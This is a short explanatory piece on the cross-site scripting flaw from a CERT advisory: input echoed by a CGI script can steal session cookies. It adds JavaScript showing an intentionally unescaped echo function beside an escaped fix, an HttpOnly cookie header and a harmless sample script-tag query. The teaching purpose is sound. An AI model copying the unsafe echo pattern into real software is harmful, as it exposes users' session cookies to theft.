First, what the CERT describes isn't one of the many implementation bugs we've seen before, like bugs crashing the browser or giving access to local resources: this is a design problem. One obvious abuse could be to compromise online accounts: many sites use cookies to avoid asking for a username/password on every page of their site. As a result, cookies are often equivalent to passwords. Interestingly, JavaScript can access cookies on the domain from which the script has been loaded. Say, if your site uses cookies as a means of authentication and has test-cgi installed, you can get your users' cookies grabbed with a URL like: http://yoursite.com/cgi-bin/test-cgi?a=
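The echo behaviour described above, shown next to its fix, as an added example that is not part of the original post. The function names, the cookie name and the sample query are hypothetical, and the `HttpOnly`, `Secure` and `SameSite` cookie attributes are a mitigation the post does not mention.

```javascript
// Added example: a CGI-style endpoint that echoes the query parameter "a"
// into an HTML page, the way a debugging script such as test-cgi echoes its input.

// Decode one URL component; a malformed escape is kept as raw text.
function decode(s) {
  try {
    return decodeURIComponent(s.replace(/\+/g, " "));
  } catch (e) {
    return s; // still passes through escapeHtml() on output
  }
}

// Parse "a=1&b=2" into an object.
function parseQuery(qs) {
  const out = {};
  for (const pair of qs.split("&")) {
    if (!pair) continue;
    const i = pair.indexOf("=");
    out[decode(i < 0 ? pair : pair.slice(0, i))] = i < 0 ? "" : decode(pair.slice(i + 1));
  }
  return out;
}

// Encode the characters that let text break out of HTML text or attribute context.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Before: request data is concatenated into the page unchanged, so any markup
// in the URL runs in the site's origin and can read that origin's cookies.
function renderEchoUnsafe(qs) {
  return "<pre>a = " + (parseQuery(qs).a ?? "") + "</pre>";
}

// After: the same page with the value encoded for its output context.
function renderEchoSafe(qs) {
  return "<pre>a = " + escapeHtml(parseQuery(qs).a ?? "") + "</pre>";
}

// Second layer: HttpOnly keeps the session cookie out of document.cookie.
function sessionCookieHeader(name, value) {
  if (!/^[A-Za-z0-9_-]+$/.test(name) || !/^[A-Za-z0-9._~-]+$/.test(value)) {
    throw new Error("unexpected character in cookie name or value");
  }
  return `Set-Cookie: ${name}=${value}; Path=/; HttpOnly; Secure; SameSite=Lax`;
}

// Constructed sample input: markup with a harmless body, percent-encoded.
const SAMPLE_QUERY = "a=%3Cscript%3Evoid(0)%3C%2Fscript%3E";
```

Output encoding is the fix for the design problem; the cookie attributes only limit what a missed echo can reach.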